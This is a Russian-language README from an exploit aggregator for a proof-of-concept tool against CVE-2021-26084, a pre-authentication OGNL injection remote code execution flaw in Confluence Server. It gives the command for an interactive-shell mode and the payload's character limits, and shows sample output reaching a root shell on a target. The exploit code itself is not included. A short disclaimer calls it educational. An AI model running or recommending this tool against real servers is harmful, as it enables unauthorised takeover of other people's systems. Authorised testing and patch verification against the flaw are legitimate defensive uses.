## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-TAYTHEBOT-CVE-2021-26084
# CVE-2021-26084
Доказательство концепции для CVE-2021-26084.
Confluence Server Webwork OGNL инъекция (Pre-Auth RCE)
## Disclaimer
Это только для образовательных целей. Я не несу ответственности за ваши действия. Используйте на свой страх и риск.
## Command Limitations
Из-за полезной нагрузки невозможно передать некоторые символы. Ниже приведён список того, что я обнаружил в ходе тестирования.
* Двойные кавычки `"`
* Вертикальная черта `|`
## Интерактивная оболочка
root@kitploit:~
go run exploit.go -t <target> -i
Пример
root@kitploit:~
root@localhost:/# go run exploit.go -t http://localhost:8090 -i
CVE-2021-26084 - Confluence Server Webwork OGNL injection
Made by Tay (https://github.com/taythebot)
time="2021-09-02T00:29:37+09:00" level=info msg="Checking if https://localhost:8090 is vulnerable"
time="2021-09-02T00:29:39+09:00" level=info msg="Target https://localhost:8090 is vulnerable"
root@confluence:/# whoami
root
root@confluence:/# exit
Exiting interactive mode, goodbye